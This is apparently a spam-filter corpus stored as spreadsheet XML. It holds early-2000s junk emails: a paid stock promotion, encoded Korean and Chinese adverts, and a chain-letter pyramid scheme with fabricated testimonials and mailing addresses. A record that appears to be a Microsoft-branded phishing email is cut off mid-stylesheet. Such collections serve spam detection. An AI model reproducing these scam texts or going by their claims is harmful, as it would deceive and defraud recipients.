forward-looking statements within the meaning of The Private Securities=   Litigation Reform Act of 1995. These statements may be identified by su= ch terms  as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila= r terms. We are NOT  a registered investment advisor or a broker dealer. This is NOT an offe= r to buy  or sell securities. No recommendation that the securities of the compan= ies  profiled should be purchased, sold or held by individuals or entities t= hat learn  of the profiled companies. We were paid =2427,000 in cash by a third par= ty to  publish this report. Investing in companies profiled is high-risk and u= se of  this information is for reading purposes only. If anyone decides to act=  as an  investor, then it will be that investor's sole risk. Investors are advi= sed NOT  to invest without the proper advisement from an attorney or a registere= d  financial broker. Do not rely solely on the information presented, do a= dditional  independent research to form your own opinion and decision regarding in= vesting  in the profiled companies. Be advised that the purchase of such high-ri= sk  securities may result in the loss of your entire investment.    =          The owners of this publication may already own free trading sha= res in  CBYI and may immediately sell all or a portion of these shares into the=  open  market at or about the time this report is published.  Factual sta= tements  are made as of the date stated and are subject to change without notice= .   Not intended for recipients or residents of CA,CO,CT,DE,ID,             IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where  prohibited.  Copyright c 2001 ****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73</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: µ_x0003_&lt;total@informland.co.kr&gt;\nDate: Tue, 23 Jul 2002 01:54:45 -0500</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 01:54:45 -0500</t>
  </si>
  <si>
    <t>µ_x0003_&lt;total@informland.co.kr&gt;</t>
  </si>
  <si>
    <t>[]µ_x0003_ ¾_x0007_º_x0001_</t>
  </si>
  <si>
    <t>=BA=CE=B5=BF=BB=EA=C1=A4=BA=B8=B3=AA=B6=F3     =B9=AE=C0=C7=C0=FC=C8=AD 02-2613-1470 =BA=CE=B5=BF=BB=EA=C1=A4=BA=B8= =B3=AA=B6=F3[URL]http://www.informland.co.kr[/URL]             E-mail  :tota= l@informland.co.kr =BC=F6=BD=C5=C0= =BB=20       =BF=F8=C4=A1=BE=CA=C0=B8=BD=C3=B8=E9 "=20              =BC=F6=BD=C5=B0=C5=BA=CE " =B8=A6 =C5=AC=B8=AF =C8=C4=20       "  =BA=B8=B3=BB=B1=E2 " =B9=F6=C6=B0 =B8=A6 =B4=AD=B7=AF =C1=D6=BD=C3=B1=E2 =B9=D9=B6=F8= =B4=CF=B4=D9[ =BC=F6=BD=C5=B0=C5=BA=CE=20                  ]=20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http://www.informland.co.kr http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5406</t>
  </si>
  <si>
    <t>To: &lt;Valued.Clients@gateway.de&gt;\nFrom: "Josie Rosinski" &lt;vnmxchgfjghfd345@msn.com&gt;\nDate: Tue, 23 Jul 2002 01:53:27 -1700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 01:53:27 -1700</t>
  </si>
  <si>
    <t>"Josie Rosinski" &lt;vnmxchgfjghfd345@msn.com&gt;</t>
  </si>
  <si>
    <t>&lt;Valued.Clients@gateway.de&gt;</t>
  </si>
  <si>
    <t>Fw: Keep it under wraps, but this one works a treat!             25031</t>
  </si>
  <si>
    <t>creditfix Thank You, Your email address was obtained from a purch= ased  list, Reference # 1580-17600.  If you wish to unsubscribe from t= his list, please  Click here and e= nter your  name into the remove box. If you have previously  unsubscribed and are still receiving this message, you may email our  Abuse Control=  Center,  or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way,  Miami, FL, 33155". © 2002 Web Credit Inc. All Rights Reser= ved.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368</t>
  </si>
  <si>
    <t>To: Undisclosed.Recipients@einstein.ssz.com\nFrom: qvaC:"\My Documents\Superserver\SS data\From names\50 FROM fields newaddresses.txt" &lt;bhOurbestmonth@yahoo.com&gt;\nDate: Tue, 23 Jul 2002 00:43:06 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 00:43:06 -0400</t>
  </si>
  <si>
    <t>qvaC:"\My Documents\Superserver\SS data\From names\50 FROM fields newaddresses.txt" &lt;bhOurbestmonth@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Undisclosed.Recipients@einstein.ssz.com</t>
  </si>
  <si>
    <t>Your Commissions of $5000 per WEEK! ssva</t>
  </si>
  <si>
    <t>Give me 5 minutes and I will show you how\nto turn your computer into a cash machine!!!\n\n(Available in the US and Canada)\n\nI earned $25,000 last month - send for my bank statements!!!\n\nWe are giving away a FREE, 3-day vacation to all\nfolks who ask for more info on how to earn $1000\nper sale simply by using their computer!\n\nYou'll earn $1000 per sale on a low cost product and\n$3000 per business contact - \nand all marketing is from the internet. Free\nsophisticated and duplicatable marketing system\n($2500 value) is given to you gratis - as well as ALL\ntraining and marketing support!!!\n\nWe invite you to explore, with no obligation, some\ninformation that could turn around your\nincome and bring in thousands per week! \n\nIf you just want some extra income, or if you are a \nseasoned marketer - our paint-by-numbers system with LIVE\nsupport (up to 10:00 pm eastern every day!) will turn you\ninto a pro!!!\n\nFamily-loved product!!!\n\nWe will have you in profit QUICK - and with\nconstant, live FREE support!!!!\n\nREQUEST more free info NOW-\nsend an email to: growthmarkets@excite.com with "SEND INFO" in the subject line!!\n(do NOT click REPLY!)\n\n**********************************************************\nThis email conforms to commercial email regulations within the US.\nPlease send any "remove" requests to: growthmarkets@excite.com\n**********************************************************\n\n\n\nhqkudlnlusqgpxxmqaesrhrmvpjfykfg\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357</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Cards In Advance &lt;ads@cardsinadvance.com&gt;\nDate: Tue, 23 Jul 2002 00:41:58 -0000</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 00:41:58 -0000</t>
  </si>
  <si>
    <t>Cards In Advance &lt;ads@cardsinadvance.com&gt;</t>
  </si>
  <si>
    <t>send REAL PAPER GREETING CARDS on-line!</t>
  </si>
  <si>
    <t>Cards In Advance Birthday Anniversary Get Well Soon Thinking of you Congratulations Sympathy Engagement Good Luck New Baby New Home Love &amp; Romance Friendship Retirement Graduation Thank You Valentine's Day (Feb) Passover (Apr) Easter (Apr) Mother's Day (May) Father's Day (Jun) Rosh Hashana (Sep) Halloween (Oct) Thanksgiving (Nov) Christmas (Dec) Happy New Year (Dec) Hanukkah (Dec)   You received this email because you signed up at one of Cards In Advance's websites or you signed up with a party that has contracted with Cards In Advance. To unsubscribe from the Cards In Advance mailing list please reply to this email with "remove" as the subject. [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5336</t>
  </si>
  <si>
    <t>To: cypher00000000@yahoo.com.tw\nFrom: 023anlin@ms35.hinet.net\nDate: Tue, 23 Jul 2002 00:26:15 +0800</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 00:26:15 +0800</t>
  </si>
  <si>
    <t>023anlin@ms35.hinet.net</t>
  </si>
  <si>
    <t>cypher00000000@yahoo.com.tw</t>
  </si>
  <si>
    <t>=?Big5?B?s8y3c6V4xles2aR1sNOmV7/9LTEtMTY3LQ==?=</t>
  </si>
  <si>
    <t>\n\n**=B3=CC=B7s=A5x=C6W=AC=D9=A4u=B0=D3=\n=A6W=BF=FD=A1=D0=A6=A8=A5\=AA=BA=AB=B4=BE=F7=A1=FE=ADP=B3=D3=AA=BA=A5=FD=BE=\n=F7**  \n---  \n  \n![](3D"h=) |\n\n![](3D"[URL]http://vip.6to23.com[/URL]  \n---|---  \n  \n=B4=BA=AE=F0=A4=A3=A8=CE=A7A=B7Q=B5= u=B4=C1=ADP=B4I=AC=F0=AF}=B2{=AA=AC=B6=DC\n?\n\n=20\n\n=A8C=A4=D1=A6=A3=B8L=AA=BA=A4u=A7@=C5=FD=A7A=B5L=\n=B7v=B6}=B5o=B7s=AB=C8=A4=E1=B6=DC ?\n\n=20\n\n=B3o=B8=CC=A6=B3=A5x=C6W=B3=CC=B7s=A4@=A4=E2=AA=BA=\n=A4=BD=A5q=B8=EA=AE=C6=A1A=BEA=A6X=A6U\n\n=20\n\n=A6=E6=B7~=A8=CF=A5=CE=A1A=BC=C6=B6q=A6=B3=AD=AD= =B9w=C1=CA=B1q=B3t=A1C\n\n=20  =20  \n=20  =20\n\n=A1=B4 = =20\n=A5=FE=AC=D9=A4u=B0=D3=B8=EA=AE=C6=AEw=AC=F9=A2=B1=A2=AF=B8U=B5=A7  \n= =20 =A1=B4 =B4=A3=A8=D1=A6U=BA=D8=AE=E6=A6=A1=\n=A6C=A6L=A1]=B6l=B1H=BC=D0=C3=B1=A1B=ABH=AB=CA=A1E=A1E=A1^  \n= =20 =A1=B4 =B8=EA=AE=C6=B6=B5=A5=D8=A1]=B2=CE=\n=A4@=BDs=B8=B9=A1B=A4=BD=A5q=A6W=BA=D9=A1B=ADt=B3d=A4H=A1B  \n= =20      =B8=EA=A5=BB=C3B=A1B=A6a=A7}=A1B=B3]=A5=DF=A4=E9=B4=C1=\n=A1B=A6=E6=B7~=A7O=A1^  \n=20 =A1=B4 =B4=A3=A8=D1=B4=BC=BCz=AB=AC=BA=EE=\n=A6X=ACd=B8=DF=A5\=AF=E0=A1A=A4=E8=ABK=B7j=B4M  \n=20 =A1=B4 =B8=EA=AE=C6=AEw=A5i=ACd=B8=DF=A1B=\n=AD=D7=A7=EF=A1B=A7R=B0=A3=A1B=A6C=A6L\n\n=20\n\n=A1=B4 =A5t=A7K=B6O=AA=FE=C3=D8=A4Q=\n=B4X=AEM=B0=D3=A5=CE=B3n=C5=E9=A4=CE=BCv=AD=B5=B1=D0=BE=C7=B3n=C5=E9\n\n=20  =20  \n=20  =20  =20\n\n=20\n\n![](3D"htt=)\n\n= =20  =20\n\n**=B1H=A5=F3=A4H=A1G** =20 **=B2=A3=AB~=A6W=BA=D9=A1G =20\n=A4u=B0=D3=A5=D8=BF=FDCD =20 **\n\n=20\n\n**=B1H=A5=F3=A6a=A7}=A1G** = =20\n\n=20\n\n**=A6=ED=A6v=B9q=B8=DC=A1G    =20 =A5I=B4=DA=A4=E8=A6=A1=A1G =20\n=B3f=A8=EC=A5I=B6O =20 =B9q=B6=D7 =20 **\n\n=20\n\n**=A4=BD=A5q=B9q=B8=DC=A1G  ** **=20** **=20** =20 ** **\n\n=20\n\n**=A6=E6=B0=CA=B9q=B8=DC=A1G     =20 =C0u=AB=DD=BB=F9500=A4=B8=A7t=B9B= =B6O\n=20 **\n\n=20  =20 =20  =20 =20 =20  \--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vip.6to23.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5356</t>
  </si>
  <si>
    <t>To: "Friend" &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: "Only the Best" &lt;OnlyTheBest_______r-7552100-335@mm53.com&gt;\nDate: Tue, 23 Jul 2002 00:09:12 UT</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 00:09:12 UT</t>
  </si>
  <si>
    <t>"Only the Best" &lt;OnlyTheBest_______r-7552100-335@mm53.com&gt;</t>
  </si>
  <si>
    <t>Friend, Get this Cell Phone for Free!</t>
  </si>
  <si>
    <t>![]([URL]http://209.126.159.62[/URL] |\n![]([URL]http://209.126.159.62[/URL]  \n---|---  \n![]([URL]http://209.126.159.62[/URL] |\n![]([URL]http://209.126.159.62[/URL] |\n![]([URL]http://209.126.159.62[/URL]  \n![]([URL]http://209.126.159.62[/URL] |\n![]([URL]http://209.126.159.62[/URL]  \n![]([URL]http://209.126.159.62[/URL] | ![]([URL]http://209.126.159.62[/URL] |\n![]([URL]http://209.126.159.62[/URL] | ![]([URL]http://209.126.159.62[/URL]  \n![](file:///C|/Documents%20and%20Settings/Administrator.DEEP-\nTHOUGHT.000/Local%20Settings/Temporary%20Internet%20Files/Content.IE5/YX8FE9Q5/top%5B1%5D.gif)\n![]([URL]http://click.mm53.com[/URL]  \n\n  \n| Remove yourself from this recurring list by:  \n---  \nClicking here to send a blank email to unsub-7552100-335@mm53.com  \n_OR_  \nSending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319,\nNashua, NH 03063  \n  \n_This message was sent to address cypherpunks@einstein.ssz.com_  \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http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://209.126.159.62 http://click.mm53.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5379</t>
  </si>
  <si>
    <t>To: My.Friend@locust.minder.net\nFrom: &lt;interpol10000@hotmail.com&gt;\nDate: Tue, 23 Jul 0102 08:14:27 -0200</t>
  </si>
  <si>
    <t>Tue, 23 Jul 0102 08:14:27 -0200</t>
  </si>
  <si>
    <t>&lt;interpol10000@hotmail.com&gt;</t>
  </si>
  <si>
    <t>My.Friend@locust.minder.net</t>
  </si>
  <si>
    <t>Easy to make from $200,000 every 7 months</t>
  </si>
  <si>
    <t>\n\n**Easy to make "Between $200,000 and $500,000 every seven months  \n**  \n***Under Bill S.1618 TITLE III passed by the 105th U.S. Congress this letter\nCan Not be Considered Spam as long as we include the way to be removed.  \n  \n//////////////////////////////////////////////////////////////////////////////  \nThis message is sent in compliance with the new e-mail bill: SECTION 301.\nSender: "Per Section 301, Paragraph (a)(2)(C) of S. 1618, further\ntransmissions to you by sender of this email may be stopped, at no cost to\nyou, by sending a reply to this email address with the word "remove" in the\nsubject line."  \n///////////////////////////////////////////////////////////////////////////////  \n  \n **Dear Friends  \n**  \nAS SEEN ON NATIONAL TV:  Making over half million dollars every 4 to 5 months\nfrom your home for an investment of only $25 U.S. Dollars expense one time\nTHANK'S TO THE COMPUTER AGE AND THE INTERNET !  \n  \n==================================================  \n  \n **BE IN GOOD MONEY WITHIN A YEAR!!!  \n**  \nBefore you say ''Bull'', please read the following. This is the letter you\nhave been hearing about on the news lately. Due to the popularity of this\nletter on the Internet, a national weekly news program recently devoted an\nentire show to the investigation of this program described below, to see if it\nreally can make people money. The show also investigated whether or not the\nprogram was legal.  \n  \nTheir findings proved once and for all that there are ''absolutely NO Laws\nprohibiting the participation in the program and if people can -follow the\nsimple instructions, they are bound to make some money with only $25 out of\npocket cost''.  \n  \nDUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT THIS PROGRAM HAS ATTAINED,\nIT IS CURRENTLY WORKING BETTER THAN EVER.  \n  \nThis is what one had to say:  \n  \n"I was approached many times before but each time I passed on it. I am so glad\nI finally joined just to see what one could expect in return for the minimal\neffort and money required. To my astonishment, I received total $610,470.00 in\n21 weeks, with money still coming in."  \n  \nPam Hedland, Fort Lee, New Jersey.  \n  \n===================================================  \n  \nHere is another testimonial:  \n  \n"This program has been around for a long time but I never believed in it. But\none day when I received it again in the mail I decided to gamble my $25 on it.\nI followed the simple instructions and walaa .... 3 weeks later the money\nstarted to come in.  \n  \n The first month I only made $240.00 but the next 2 months after that I made a\ntotal of $290,000.00. So far, in the past 8 months by re-entering the program,\nI have made over $710,000.00 and I am playing it again. The key to success in\nthis program is to follow the simple steps and NOT change anything."  \n  \nMore testimonials later but first,  \n  \n===== PRINT THIS NOW FOR YOUR FUTURE REFERENCE ======  \n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  \nIf you would like to make at least $500,000 every 4 to 5 months easily and  \ncomfortably, please read the following...THEN READ IT AGAIN and AGAIN!!!  \n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  \n  \nFOLLOW THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL DREAMS WILL COME TRUE,\nGUARANTEED!  \n  \n**INSTRUCTIONS:  \n**  \n=====Order all 5 reports shown on the list below =====  \n **For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT  \nYOU ARE ORDERING and YOUR E-MAIL ADDRESS to the person whose name appears ON\nTHAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON YOUR\nENVELOPE TOP LEFT CORNER in case of any mail problems.  \n**  \n=== When you place your order, make sure you order each of the 5 reports.  You\nwill need all 5 reports so that you can save them on your computer and resell\nthem. YOUR TOTAL COST $5 X 5=$25.00.  \n  \nWithin a few days you will receive, via e-mail, each of the 5 reports from\nthese 5 different individuals. Save them on your computer so they will be\naccessible for you to send to the 1,000's of people who will order them from\nyou. Also make a floppy of these reports and keep it on your desk in case\nsomething happens to your computer.  \n  \nIMPORTANT - DO NOT alter the names of the people who are listed next to each\nreport, or their sequence on the list, in any way other than what is\ninstructed below in step '' 1 through 6 '' or you will lose out on a majority\nof your profits. Once you understand the way this works, you will also see how\nit does not work if you change it. Remember, this method has been tested, and\nif you alter it, it will NOT work !!! People have tried to put their\nfriends/relatives names on all five thinking they could get all the money. But\nit does not work this way. Believe us, we all have tried to be greedy and then\nnothing happened. So Do Not try to change anything other than what is\ninstructed. Because if you do, it will not work for you.  Remember, honesty\nreaps the reward!!!  \n  \n1.... After you have ordered all 5 reports, take this advertisement and REMOVE\nthe name &amp; address of the person in REPORT # 5. This person has made it\nthrough the cycle and is no doubt counting their fortune.  \n  \n2.... Move the name &amp; address in REPORT # 4 down TO REPORT # 5.  \n  \n3.... Move the name &amp; address in REPORT # 3 down TO REPORT # 4.  \n  \n4.... Move the name &amp; address in REPORT # 2 down TO REPORT # 3.  \n  \n5.... Move the name &amp; address in REPORT # 1 down TO REPORT # 2  \n  \n6.... **Insert YOUR name &amp; address in the REPORT # 1 Position.** **PLEASE MAKE  \nSURE you copy every name &amp; address ACCURATELY!  \n**  \n==========================================================  \n  \n**** Take this entire letter, with the modified list of names, and save it on\nyour computer. DO NOT MAKE ANY OTHER CHANGES.  \n  \nSave this on a disk as well just in case if you loose any data. To assist you\nwith marketing your business on the internet, the 5 reports you purchase will\nprovide you with invaluable marketing information which includes how to send\nbulk e-mails legally, where to find thousands of free classified ads and much\nmore. There are 2 Primary methods to get this venture going:  \n  \nMETHOD # 1: BY SENDING BULK E-MAIL LEGALLY  \n==========================================================  \nLet's say that you decide to start small, just to see how it goes, and we will\nassume You and those involved send out only 5,000 e-mails each. Let's also\nassume that the mailing receive only a 0.2% response (the response could be\nmuch better but lets just say it is only 0.2%. Also many people will send out\nhundreds of thousands e-mails instead of only 5,000 each).  \nContinuing with this example, you send out only 5,000 e-mails. With a 0.2%\nresponse, that is only 10 orders for report # 1.  \n  \nThose 10 people responded by sending out 5,000 e-mail each for a total of\n50,000. Out of those 50,000 e-mails only 0.2% responded with orders.\nThat's=100 people responded and ordered Report # 2.  \n  \nThose 100 people mail out 5,000 e-mails each for a total of 500,000 e-mails.\nThe 0.2% response to that is 1000 orders for Report # 3.  \n  \nThose 1000 people send out 5,000 e-mails each for a total of 5 million e-mails\nsent out. The 0.2% response to that is 10,000 orders for Report # 4.  \n  \nThose 10,000 people send out 5,000 e-mails each for a total of 50,000,000 (50\nmillion) e-mails. The 0.2% response to that is 100,000 orders for Report #5  \n  \nTHAT'S 100,000 ORDERS TIMES $5 EACH=$500,000.00 (half million).  \nYour total income in this example is:  \n1..... $50 + 2..... $500 \+ 3..... $5,000 + 4.... $50,000 + 5..... $500,000\n\nGrand Total=$555,550.00  \n  \nNUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE\nRESPONSES AND NO MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF\nMONEY !  \n  \n=========================================================  \n  \nREMEMBER FRIENDS, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF 5,000 YOU\nMAILED TO.  Dare to think for a moment what would happen if everyone or half\nor even one 4th of those people mailed 100,000 e-mails each or more? There are\nover 150 million people on the Internet worldwide and counting. Believe me,\nmany people will do just that, and more!  \n  \nMETHOD #2: BY PLACING FREE ADS ON THE INTERNET  \n=======================================================  \nAdvertising on the net is very very inexpensive and there are hundreds of FREE\nplaces to advertise. Placing a lot of free ads on the Internet will easily get\na larger response. We strongly suggest you start with Method # 1 and add\nMETHOD # 2 as you go along. For every $5 you receive, all you must do is\ne-mail them the Report they ordered. That's it. Always provide same day\nservice on all orders. This will guarantee that the e-mail they send out, with\nyour name and address on it, will be prompt because they can not advertise\nuntil they receive the report.  \n  \n=========== AVAILABLE REPORTS ====================  \nORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always send $5 cash (U.S.\nCURRENCY) for each Report. Checks NOT accepted. Make sure the cash is\nconcealed by wrapping it in at least 2 sheets of paper. On one of those sheets\nof paper, Write the NUMBER &amp; the NAME of the Report you are ordering, YOUR\nE-MAIL ADDRESS and your name and postal address.  \n  \nPLACE YOUR ORDER FOR THESE REPORTS NOW!!  \n====================================================  \n  \n\n  \n\n  \n**REPORT # 1: The Insider's Guide to Advertising for Free on the Net  \n**  \nOrder Report #1 from:  \nB.H.  \n218 Timberwood  \nIrvine, Cal  92620\n\nUSA\n\n  \n ________________________________________________________  \n **REPORT # 2: The Insider's Guide to Sending Bulk E-mail on the Net  \n**  \nOrder Report # 2 from:  \n J.B. Erhart  \n722 10th Street  \nPaso Robles, CA. 93446  \nUSA  \n_________________________________________________________________  \n **REPORT # 3: Secrets to Multilevel Marketing on the Net  \n**  \nOrder Report # 3 from:  \nS.W.  \n131 E. Eden  \nFresno, Cal. 93706  \nUSA  \n______________________________________________________________  \n **REPORT # 4: How to Achieve Financial Independence in a Global Economy  \n  \n**\n\nOrder Report # 4 from:  \nF.L.\n\n225 Bridlecreek Park S.W.\n\nCalgary, Alberta, CA\n\nT2Y 3P1\n\n  \n________________________________________________________________  \n **REPORT #5: How to Send Out 0ne Million Emails For Free  \n**  \nOrder Report # 5 from:\n\nK.H.\n\n2025 Red River Road\n\nSykesville, MD  21784\n\nUSA  \n  \n________________________________________________________________________  \n  \n\n  \n\n  \n**$$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$  \n**  \nFollow these guidelines to guarantee your success:  \n  \n=== If you do not receive at least 10 orders for Report #1 within 2 weeks,\ncontinue sending e-mails until you do.  \n  \n=== After you have received 10 orders, 2 to 3 weeks after that you should\nreceive 100 orders or more for REPORT # 2. If you did not, continue\nadvertising or sending e-mails until you do.  \n  \n=== Once you have received 100 or more orders for Report # 2, YOU CAN RELAX,\nbecause the system is already working for you, and the cash will continue to\nroll in ! THIS IS IMPORTANT TO REMEMBER: Every time your name is moved down on\nthe list, you are placed in front of a Different report.  \n  \nYou can KEEP TRACK of your PROGRESS by watching which report people are\nordering from you. IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER BATCH OF\nE-MAILS AND START THE WHOLE PROCESS AGAIN.  There is NO LIMIT to the income\nyou can generate from this business !!!  \n  \n======================================================  \n  \nFOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM:  \n  \nYou have just received information that can give you financial freedom for the\nrest of your life, with NO RISK and JUST A LITTLE BIT OF EFFORT. You can make\nmore money in the next few weeks and months than you have ever imagined.\nFollow the program EXACTLY AS INSTRUCTED. Do Not change it in any way. It\nworks exceedingly well as it is now.  \n  \nRemember to e-mail a copy of this exciting report after you have put your name\nand address in Report #1 and moved others to #2 ...........# 5 as instructed\nabove. One of the people you send this to may send out 100,000 or more e-mails\nand your name will be on every one of them.  Remember though, the more you\nsend out the more potential customers you will reach. So my friend, I have\ngiven you the ideas, information, materials and opportunity to become\nfinancially independent. IT IS UP TO YOU NOW !  \n  \n============ MORE TESTIMONIALS ================  \n  \n"My name is Mitchell. My wife, Jody and I live in Chicago. I am an accountant\nwith a major U.S. Corporation and I make pretty good money. When I received\nthis program I grumbled to Jody about receiving ''junk mail''. I made fun of\nthe whole thing,spouting my knowledge of the population and percentages\ninvolved. I ''knew'' it wouldn't work. Jody totally ignored my supposed\nintelligence and few days later she jumped in with both feet. I made merciless\nfun of her, and was ready to lay the old ''I told you so'' on her when the\nthing didn't work. Well, the laugh was on me! Within 3 weeks she had received\n50 responses. Within the next 45 days she had received total $ 147,200.00\n........... all cash! I was shocked. I have joined Jody in her ''hobby''.\nMitchell Wolf M.D., Chicago, Illinois  \n  \n======================================================  \n  \n''Not being the gambling type, it took several weeks to make up my mind to\nparticipate in this plan. But conservative that I am, I decided that the\ninitial investment was so little that there was just no way that I wouldn't\nget enough orders to at least get my money back''. '' I was surprised when I\nfound my medium size post office box crammed with orders. I made $319,210.00in\nthe first 12 weeks. The nice thing about this deal is that it does not matter\nwhere people live. There simply isn't a better investment with a faster return\nand so big."  Dan Sondstrom, Alberta, Canada  \n  \n=======================================================  \n  \n''I had received this program before. I deleted it, but later I wondered if I\nshould have given it a try. Of course, I had no idea who to contact to get\nanother copy, so I had to wait until I was e-mailed again by someone\nelse.........11 months passed then it luckily came again...... I did not\ndelete this one! I made more than $490,000 on my first try and all the money\ncame within 22 weeks."  Susan De Suza, New York, N.Y.  \n  \n=======================================================  \n  \n''It really is a great opportunity to make relatively easy money with little\ncost to you. I followed the simple instructions carefully and within 10 days\nthe money started to come in. My first month I made $20,560.00 and by the end\nof third month my total cash count was $362,840.00. Life is beautiful, Thanx\nto internet.".  Fred Dellaca, Westport, New Zealand  \n  \n=======================================================  \n ** _ORDER YOUR REPORTS TODAY AND GET STARTED ON  \n'YOUR' ROAD TO FINANCIAL FREEDOM !  \n_**  \n  \n\n\n\--DeathToSpamDeathToSpamDeathToSpam--\n\------------------------------------------------------- This sf.net email is\nsponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL]\n_______________________________________________ Spamassassin-Sightings mailing\nlist Spamassassin-Sightings@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n</t>
  </si>
  <si>
    <t>5339</t>
  </si>
  <si>
    <t>To: $$$$@locust.minder.net\nFrom: &lt;residual712254i20@excite.com&gt;\nDate: Tue, 23 Jul 0102 03:26:35 +1000</t>
  </si>
  <si>
    <t>Tue, 23 Jul 0102 03:26:35 +1000</t>
  </si>
  <si>
    <t>&lt;residual712254i20@excite.com&gt;</t>
  </si>
  <si>
    <t>$$$$@locust.minder.net</t>
  </si>
  <si>
    <t>Adv: Global Opportunity/Up To $53,719 Per Month!                                          8741yt-6</t>
  </si>
  <si>
    <t>Proven 6 Year Old Better Business Registered Company Provides \nA REAL And Legitimate Opportunity To Make Some SERIOUS MONEY!\n\nGLOBAL OPPORTUNITIES! (Around The World)\n\nNo Selling!			\nNo Phone Calls!			\nNo Recruiting!\nNo Meetings To Attend!\n80% Pay Out!  (No Kidding)\nPAYS WEEKLY!\n\nSpillover, Spillover, Spillover, From Our Massive Advertising Programs!!\nMembership Includes, Immediate FREE Money Making Website!\n\nNO EXPERIENCE REQUIRED...ALL YOU NEED TO DO IS ENROLL...\nANYONE CAN DO THIS...THAT MEANS ANYONE!\n                                                                                                                                                        ANYONE CAN DO THIS!\nCheck out: [URL]http://www.worldbizservices.net[/URL]\n\nWill Also Receive Information On a NEW Ground Floor Program!!\nEarn $100, $200, $400, $800, $1600, $3200, $6400, Ect. Per Month!\nALSO PAYS WEEKLY! (100% GUARANTEED)\n-----------------------------------------------------------------------------------------------------------------\n\n"You are receiving this e-mail because you have purchased something online\n or signed up for information over the last 6 months. If you would like to be\n removed  from this list send an e-mail to mresidual3@excite.com, and put\nremove in the subject line."\n\n  \n								\n2693CYCh6-467VCaV9333LtvW4-049ChsA2496Lhcg4-87l43\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http://www.worldbizservices.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>706</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Microsoft account team\n &lt;account-security-noreply@accountprotection.microsoft.com&gt;\nDate: Tue, 23 Jan 2018 04:11:33 -0800</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2018 04:11:33 -0800</t>
  </si>
  <si>
    <t>Re...........</t>
  </si>
  <si>
    <t>@import url([URL]http://image.email.office.com[/URL]; #outlook a {padding:0;} .ReadMsgBody {width:100%;} .ExternalClass{width:100%;} .ExternalClass, .ExternalClass p, .ExternalClass span, .ExternalClass font, .ExternalClass td, .ExternalClass div {line-height: 100%;} body, table, td, a {-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%;} table, td {mso-table-lspace:0pt; mso-table-rspace:0pt; border-collapse: collapse;} img {-ms-interpolation-mode:bicubic !important;} .ExternalClass img[class^=Emoji] { width: 10px !important; height: 10px !important; display: inline !important; } .ExternalClass .ecxhm { display: none !important; } .ExternalClass .ecxhm2 { display: inline !important; } .appleBody a {color:#68440a; text-decoration: none;} .appleFooter a {color:#999999; text-decoration: none;} @-ms-viewport{ width: device-width;} a[x-apple-data-detectors] {color: inherit !important; text-decoration: none !important; font-size: inherit !important; font-family: inherit !important; font-weight: inherit !important; line-height: inherit !important;} a, a span, a.span: hover {color: #3d3d3d; background-color: none !important; border: none !important; } body, div, span, td, p {margin:0; padding:0;} img {border:0; height:auto; line-height:100%; outline:none; text-decoration:none; image-rendering: auto;} table {border-collapse:collapse !important;} table, th, td { font-weight:normal; } body {height:100% !important; margin:0; padding:0; width:100% !important;} a.tel, a.tel: link, a.tel: visited, a.tel: hover, a.tel: active {text-decoration: none !important; background-color: none !important; border: none !important; } a.addr, a.addr: link, a.addr: visited, a.addr: hover, a.addr: active {text-decoration: none !important; background-color: none !important; border: none !important; } a img {border:none;} sup, sub { vertical-align: baseline; position: relative; top: -0.4em; } sub { top: 0.4em; } table[DIR="rtl"], table td[DIR="rtl"], span[DIR="rtl"], div[DIR="rtl"] {direction:RTL !important; unicode-bidi:embed !important;}   @media screen and (max-device-width: 497px), screen and (max-width: 497px) { *[class*="container"] { width:100% !important; min-width:300px !important; max-width:480px !important; margin: 0; padding:0; word-wrap:normal; } *[class*="container"] table { width:100% !important; } *[class*="hide"] { display:none !important; } *[class*="ftafdrop"] { display:block !important; width: 100% !important; } *[class*="drop"] { display:block !important; width: 100% !important; } 